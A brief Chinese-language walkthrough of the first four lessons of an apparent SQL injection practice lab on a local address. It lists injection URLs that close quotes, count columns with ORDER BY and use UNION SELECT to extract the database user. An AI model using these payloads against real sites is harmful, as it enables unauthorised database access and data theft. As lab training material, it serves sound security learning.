less 1
1、http://192.168.1.119/sqli/Less-1/?id=1
2、在id后面输入’,网页报错,
3、报错内容’1’’ LIMIT 0,1
4、猜测该sql语句为select * from ad where id=‘id’ limit 0,1
5、我们试着闭合
http://192.168.1.119/sqli/Less-1/?id=1’ --+
程序正常
6、通过order by判断字段数
http://192.168.1.119/sqli/Less-1/?id=1’ order by 3 --+
7、利用union select联合查询,获取表名
1’ union select 1,2,3 --+
http://192.168.1.119/sqli/Less-1/?id=19’ union select 1,user(),3 --+ 获取用户信息
less 2
1、http://192.168.1.119/sqli/Less-1/?id=1
2、输入and 1=1或 and 1=2,发现存在注入漏洞
3、通过order by还有union select得到用户信息
http://192.168.1.119/sqli/Less-2/?id=0 UNION SELECT 1,user(),3
less 3
1、通过报错可以用“’)”进行闭合
http://192.168.1.119/sqli/Less-3/?id=1’) --+
2、后面参照第一课
less 4
1、通过报错可以用“")”进行闭合
http://192.168.1.119/sqli/Less-4/?id=1") --+
2、后面参照第一课
禁止非法,后果自负